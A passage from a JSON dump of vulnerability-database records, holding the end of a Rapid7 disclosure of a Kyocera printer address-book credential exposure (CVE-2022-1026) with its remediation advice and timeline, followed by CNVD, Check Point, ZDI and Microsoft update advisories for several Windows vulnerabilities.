such as 'login_password', 'login_name'\")\n \n\n## Impact\n\nThe most likely attack scenario involving this vulnerability would be an attacker, who is already inside the LAN perimeter, leveraging their ability to communicate directly with affected printers to learn the usernames and passwords to stored SMB and FTP file servers. In the case of SMB credentials, those might then be leveraged to establish a presence in the target networks' Windows domain.\n\nDepending on how those external services are administered, the attacker may also be able to collect prior (and future) print/scan jobs originating from the targeted printer, but the primary value of this vulnerability is lateral movement within the network. Note that printer credentials are not themselves at risk (except in the case of reused passwords, of course), but credentials to services the printer is normally expected to store scanned documents are exposed via this vulnerability.\n\n## Remediation\n\nFirst and foremost, MFPs should under no circumstance be able to be reached directly across the internet. While this is true for most LAN-centric technologies, this is especially true for printers and scanners, which are popular targets for opportunistic attackers. These devices tend to only support weak authentication mechanisms, even in the best of cases, and are rarely kept up to date with firmware updates to address security issues. So, as long as only trusted users can reach these networked printers, the opportunity for attack is limited only to insiders and attackers who have otherwise managed to already establish a local network presence.\n\nAt the time of this disclosure, there is no patch or updated firmware available for affected devices. The version information displayed on a vulnerable [ECOSYS M2640idw](<https://www.kyoceradocumentsolutions.us/en/products/mfp/ECOSYSM2640IDW.html>) device is shown as below, and we believe the proper version number for this software is the middle version listed, \"2S0_1000.005.0012S5_2000.002.505.\"\n\n![CVE-2022-1026: Kyocera Net View Address Book Exposure](https://blog.rapid7.com/content/images/2022/03/Screen-Shot-2022-03-28-at-4.13.37-PM.png)\n\nIn light of the lack of patching, Kyocera customers are advised to disable the SOAP interface running on port 9091/TCP of affected MFPs. Details on precisely how to disable this service can be found in the documentation relevant to the specific MFP model. If SOAP access is required over the network for normal operation, users should ensure that address books do not contain sensitive, unchanging passwords.\n\nOne possible configuration that would make this vulnerability moot would be to only allow public, anonymous FTP or SMB write access (but not read access) for scanned document storage, and another process to move those documents securely across the network to their final destination. The exposure of email addresses would remain, but this is of considerably less value to most attackers.\n\n## Disclosure timeline\n\n * **Nov 2021:** Issue identified by Aaron Herndon of Rapid7\n * **Tue Nov 16, 2021:** Contacted Kyocera's primary support and other-support \n * Received auto-reply from [info@das.kyocera.com](<mailto:info@das.kyocera.com>)\n * **Fri Nov 19, 2021:** Opened case number: CS211119002 with Kyocera support\n * **Mon Nov 22, 2021:** Released details to the vendor\n * **Fri Jan 7, 2022:** Opened JPCERT/CC case number JVNVU#96890480 \n * Discovered a more reliable security-specific contact at Kyocera\n * **Wed Jan 19, 2022:** Extended disclosure deadline to mid-March, 2022\n * **Jan-Mar 2022:** Communication about workarounds and other mitigations\n * **Fri Mar 18, 2022:** CVE-2022-1026 reserved\n * **Tue Mar 29, 2022:** Public disclosure (this document)\n\n**_Additional reading:_**\n\n * _[Analyzing the Attack Landscape: Rapid7\u2019s 2021 Vulnerability Intelligence Report](<https://www.rapid7.com/blog/post/2022/03/28/analyzing-the-attack-landscape-rapid7s-annual-vulnerability-intelligence-report/>)_\n * _[Cloud Pentesting, Pt. 1: Breaking Down the Basics](<https://www.rapid7.com/blog/post/2022/03/21/cloud-pentesting-pt-1-breaking-down-the-basics/>)_\n * _[CVE-2021-4191: GitLab GraphQL API User Enumeration (FIXED)](<https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/>)_\n * _[Dropping Files on a Domain Controller Using CVE-2021-43893](<https://www.rapid7.com/blog/post/2022/02/14/dropping-files-on-a-domain-controller-using-cve-2021-43893/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-29T13:29:15", "type": "rapid7blog", "title": "CVE-2022-1026: Kyocera Net View Address Book Exposure", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4191", "CVE-2021-43893", "CVE-2022-1026"], "modified": "2022-03-29T13:29:15", "id": "RAPID7BLOG:3889507E1F7928BBDF65D055DA138C77", "href": "https://blog.rapid7.com/2022/03/29/cve-2022-1026-kyocera-net-view-address-book-exposure/", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "cnvd": [{"lastseen": "2022-11-05T07:32:25", "description": "Fax Service is a Telephone Application Programming Interface (TAPI)-compliant system service that allows users to send and receive faxes from their desktop applications using a local fax device or a shared network fax device.A remote code execution vulnerability exists in Microsoft Windows Fax Service. An attacker could exploit this vulnerability to execute code on the target host.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-19T00:00:00", "type": "cnvd", "title": "Microsoft Windows Fax Service Remote Code Execution Vulnerability (CNVD-2021-101714)", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43234"], "modified": "2021-12-23T00:00:00", "id": "CNVD-2021-101714", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2021-101714", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-05T07:31:46", "description": "Microsoft Message Queuing technology allows applications running at different times to communicate on heterogeneous networks and systems that are temporarily offline.An information disclosure vulnerability exists in Microsoft Message Queuing. An attacker could exploit this vulnerability to execute arbitrary code by combining it with other vulnerabilities.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-19T00:00:00", "type": "cnvd", "title": "Microsoft Message Queuing Information Disclosure Vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43222"], "modified": "2021-12-23T00:00:00", "id": "CNVD-2021-101712", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2021-101712", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:30:43", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Common Log File System Driver Elevation of Privilege (CVE-2021-43226)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43226"], "modified": "2021-12-14T00:00:00", "id": "CPAI-2021-0922", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:30:28", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Installer Elevation of Privilege (CVE-2021-43883)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43883"], "modified": "2021-12-14T00:00:00", "id": "CPAI-2021-0938", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:30:43", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Print Spooler Elevation of Privilege (CVE-2021-41333)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41333"], "modified": "2021-12-14T00:00:00", "id": "CPAI-2021-0921", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:30:35", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Common Log File System Driver Elevation of Privilege (CVE-2021-43207)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43207"], "modified": "2021-12-14T00:00:00", "id": "CPAI-2021-0926", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "zdi": [{"lastseen": "2023-05-23T16:04:47", "description": "This vulnerability allows local attackers to create a denial-of-service condition on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Remote Access Connection Manager service. By creating a directory junction, an attacker can abuse the service to create a directory. An attacker can leverage this vulnerability to create a denial-of-service condition on the system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-06T00:00:00", "type": "zdi", "title": "Microsoft Windows Remote Access Connection Manager Service Link Following Denial-of-Service Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43238"], "modified": "2022-01-06T00:00:00", "id": "ZDI-22-019", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-019/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T15:45:30", "description": "This vulnerability allows local attackers to escape the low integrity sandbox on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Print Spooler service. The service can be abused to create an arbitrary file. An attacker can leverage this vulnerability to execute code in the context of the current user at medium integrity.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-21T00:00:00", "type": "zdi", "title": "Microsoft Windows Print Spooler Link Following Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41333"], "modified": "2021-12-21T00:00:00", "id": "ZDI-21-1552", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-1552/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "mskb": [{"lastseen": "2023-06-23T19:39:43", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update.\n\n**IMPORTANT** Windows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release).For information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5007247](<https://support.microsoft.com/help/5007247>) (released November 9, 2021) and addresses the following issue:\n\n * Update to support the cancellation of daylight savings time (DST) for 2021 for the Republic of Fiji.\n * Addresses a known issue that causes error codes 0x000006e4, 0x0000007c, or 0x00000709 when connecting to a remote printer that is shared on a Windows print server.\n * Addresses a known issue that might prevent apps, such as [Kaspersky](<https://support.kaspersky.com/15819>) apps, from opening after you attempt to repair or update the apps using the Microsoft Installer (MSI).\nFor more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [December 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Dec>).\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter you install this Windows update on a server that is running Windows Server 2012 R2, the server may stop responding. Additionally, you may experience a black screen, slow sign in, or general slowness over time eventually causing the server to stop responding.| To help prevent the server from experiencing this issue, install Windows update [KB5010215](<https://support.microsoft.com/help/5010215>). \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001403](<https://support.microsoft.com/help/5001403>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5008263>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5008263](<https://download.microsoft.com/download/3/1/5/315a1d84-dd41-4d61-9c62-79db4efbbc57/5008263.csv>). \n\n## **References**\n\n### \n\n__\n\nThird-party information disclaimer\n\nThe third-party products that this article discusses are manufactured by companies that are independent of Microsoft. We make no warranty, implied or otherwise, about the performance or reliability of these products.We provide third-party contact information to help you find technical support. This contact information may change without notice. We do not guarantee the accuracy of this third-party contact information.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T08:00:00", "type": "mskb", "title": "December 14, 2021\u2014KB5008263 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43893"], "modified": "2021-12-14T08:00:00", "id": "KB5008263", "href": "https://support.microsoft.com/en-us/help/5008263", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T19:39:41", "description": "None\n**11/9/2021** \n**IMPORTANT** Because of minimal operations during the holidays and the upcoming Western new year, there won\u2019t be a preview release (known as a \u201cC\u201d release) for the month of December 2021. There will be a monthly security release (known as a \u201cB\u201d release) for December 2021. Normal monthly servicing for both B and C releases will resume in January 2022. \n\n**11/17/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). For an overview of Windows 10, version 1809, see its update history page.\n\n## Highlights\n\n * Updates security for your Windows operating system. \n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include: \n\n * Addresses a known issue that might prevent Microsoft Defender for Endpoint from starting or running on devices that have a Windows Server Core installation. \nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [December 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Dec>).\n\n### Windows 10 servicing stack update - 17763.2350\n\nThis update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates. \n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing KB4493509, devices with some Asian language packs installed may receive the error, \"0x800f0982 - PSFX_E_MATCHING_COMPONENT_NOT_FOUND.\"| \n\n 1. Uninstall and reinstall any recently added language packs. For instructions, see Manage the input and display language settings in Windows 10.\n 2. Select **Check for Updates** and install the April 2019 Cumulative Update. For instructions, see Update Windows 10.\n**Note** If reinstalling the language pack does not mitigate the issue, reset your PC as follows:\n\n 1. Go to the **Settings **app > **Recovery**.\n 2. Select **Get Started** under the **Reset this PC** recovery option.\n 3. Select **Keep my Files**.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing KB5001342 or later, the Cluster Service might fail to start because a Cluster Network Driver is not found.| This issue occurs because of an update to the PnP class drivers used by this service. After about 20 minutes, you should be able to restart your device and not encounter this issue. \nFor more information about the specific errors, cause, and workaround for this issue, please see KB5003571. \nAfter installing updates released April 22, 2021 or later, an issue occurs that affects versions of Windows Server that are in use as a Key Management Services (KMS) host. Client devices running Windows 10 Enterprise LTSC 2019 and Windows 10 Enterprise LTSC 2016 might fail to activate. This issue only occurs when using a new Customer Support Volume License Key (CSVLK). **Note** This does not affect activation of any other version or edition of Windows. Client devices that are attempting to activate and are affected by this issue might receive the error, \"Error: 0xC004F074. The Software Licensing Service reported that the computer could not be activated. No Key Management Service (KMS) could be contacted. Please see the Application Event Log for additional information.\"Event Log entries related to activation are another way to tell that you might be affected by this issue. Open **Event Viewer **on the client device that failed activation and go to **Windows Logs **> **Application**. If you see only event ID 12288 without a corresponding event ID 12289, this means one of the following:\n\n * The KMS client could not reach the KMS host.\n * The KMS host did not respond.\n * The client did not receive the response.\nFor more information on these event IDs, see [Useful KMS client events - Event ID 12288 and Event ID 12289](<https://docs.microsoft.com/windows-server/get-started/activation-troubleshoot-kms-general#event-id-12288-and-event-id-12289>).| This issue is resolved in KB5009616. \nAfter you install this update on a server that is running Windows Server 2019, you might not be able to use Remote Desktop to reach the server. Eventually, the server might stop responding. Additionally, a black screen might appear, and signing in and general performance might slow.| This issue is resolved in KB5010196. \nAfter installing the November 22, 2021 or later updates, recent emails might not appear in search results in the Microsoft Outlook desktop app. This issue is related to emails that have been stored locally in a PST or OST files. It might affect POP and IMAP accounts, as well as accounts hosted on Microsoft Exchange and Microsoft 365. If the default search in the Microsoft Outlook app is set to server search, the issue will only affect the advanced search.| This issue is resolved in KB5010351.**Alternate resolution if you have not installed updates dated February 8, 2022 or later**This issue is resolved using [Known Issue Rollback (KIR)](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/known-issue-rollback-helping-you-keep-windows-devices-protected/ba-p/2176831>). Please note that it might take up to 24 hours for the resolution to propagate automatically to consumer devices and non-managed business devices. Restarting your Windows device might help the resolution apply to your device faster. For enterprise-managed devices that have installed an affected update and encountered this issue, you can resolve this by installing and configuring a special Group Policy (preferred).**Important **Verify that you are using the correct Group Policy for your version of Windows.Group Policy: [Windows 10, version 1809, Windows 10 Enterprise LTSC 2019, and Windows Server 2019](<https://download.microsoft.com/download/4/a/d/4adcd2e9-413d-4d49-9f0e-c69629dfd292/Known%20Issue%20Rollback%20011422%2001.msi>) \n \n## How to get this update\n\n**Before installing this update**Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/topic/servicing-stack-updates-ssu-frequently-asked-questions-06b62771-1cb0-368c-09cf-87c4efc4f2fe>).Prerequisite:You **must **install the August 10, 2021 SSU (KB5005112) before installing the LCU. **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5008218>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n \n**If you want to remove the LCU**To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**.Running [Windows Update Standalone Installer](<https://support.microsoft.com/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall **switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.\n\n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 